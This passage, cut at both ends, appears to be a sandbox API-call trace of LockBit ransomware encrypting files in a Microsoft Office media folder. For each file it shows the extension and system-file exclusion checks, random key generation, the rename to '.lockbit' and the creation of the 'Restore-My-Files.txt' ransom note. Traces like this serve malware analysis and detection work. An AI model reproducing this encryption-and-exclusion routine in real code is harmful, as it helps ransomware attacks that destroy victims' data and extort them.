lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.699] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.699] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF.lockbit") returned 76 [0209.699] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21318_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0209.700] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.700] malloc (_Size=0x40068) returned 0x3f70048 [0209.700] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=286) returned 1 [0209.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0209.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0209.701] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0209.702] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.702] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.702] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.703] free (_Block=0x1fa2ed8) [0209.703] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.703] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.703] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7128600, ftCreationTime.dwHighDateTime=0x1bd4f57, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa7128600, ftLastWriteTime.dwHighDateTime=0x1bd4f57, nFileSizeHigh=0x0, nFileSizeLow=0x193, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21319_.GIF", cAlternateFileName="")) returned 1 [0209.704] lstrcmpiW (lpString1=".", lpString2="BD21319_.GIF") returned -1 [0209.704] lstrcmpiW (lpString1="..", lpString2="BD21319_.GIF") returned -1 [0209.704] PathFindExtensionW (pszPath="BD21319_.GIF") returned=".GIF" [0209.704] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.704] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.704] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.705] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.705] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.705] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.705] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.705] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.705] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.706] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21319_.GIF") returned 1 [0209.706] lstrcmpiW (lpString1="ntldr", lpString2="BD21319_.GIF") returned 1 [0209.706] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21319_.GIF") returned 1 [0209.706] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21319_.GIF") returned 1 [0209.706] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21319_.GIF") returned -1 [0209.706] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21319_.GIF") returned 1 [0209.706] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21319_.GIF") returned 1 [0209.706] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.706] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF") returned=".GIF" [0209.706] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.706] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.706] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.706] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.707] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.707] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.707] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF.lockbit") returned 76 [0209.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21319_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0209.721] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.721] malloc (_Size=0x40068) returned 0x3e70008 [0209.721] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=403) returned 1 [0209.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0209.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0209.722] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0209.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.722] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.722] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.723] free (_Block=0x1fa2ed8) [0209.723] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.723] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.723] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97933d00, ftCreationTime.dwHighDateTime=0x1bd4f57, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x97933d00, ftLastWriteTime.dwHighDateTime=0x1bd4f57, nFileSizeHigh=0x0, nFileSizeLow=0x664, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21320_.GIF", cAlternateFileName="")) returned 1 [0209.723] lstrcmpiW (lpString1=".", lpString2="BD21320_.GIF") returned -1 [0209.723] lstrcmpiW (lpString1="..", lpString2="BD21320_.GIF") returned -1 [0209.723] PathFindExtensionW (pszPath="BD21320_.GIF") returned=".GIF" [0209.723] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.723] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.723] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.723] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.723] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.723] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.723] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.723] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.723] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.724] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.724] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21320_.GIF") returned 1 [0209.725] lstrcmpiW (lpString1="ntldr", lpString2="BD21320_.GIF") returned 1 [0209.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21320_.GIF") returned 1 [0209.725] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21320_.GIF") returned 1 [0209.725] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21320_.GIF") returned -1 [0209.725] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21320_.GIF") returned 1 [0209.725] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21320_.GIF") returned 1 [0209.725] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.725] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF") returned=".GIF" [0209.725] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.725] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.725] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.726] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.726] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF.lockbit") returned 76 [0209.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21320_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0209.727] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.727] malloc (_Size=0x40068) returned 0x3ef0008 [0209.727] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1636) returned 1 [0209.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.727] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0209.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0209.728] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0209.732] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.732] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.732] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.733] free (_Block=0x1fa2ed8) [0209.733] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.733] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.734] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b19a00, ftCreationTime.dwHighDateTime=0x1bd4f57, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x85b19a00, ftLastWriteTime.dwHighDateTime=0x1bd4f57, nFileSizeHigh=0x0, nFileSizeLow=0x9c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21321_.GIF", cAlternateFileName="")) returned 1 [0209.734] lstrcmpiW (lpString1=".", lpString2="BD21321_.GIF") returned -1 [0209.734] lstrcmpiW (lpString1="..", lpString2="BD21321_.GIF") returned -1 [0209.734] PathFindExtensionW (pszPath="BD21321_.GIF") returned=".GIF" [0209.734] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW 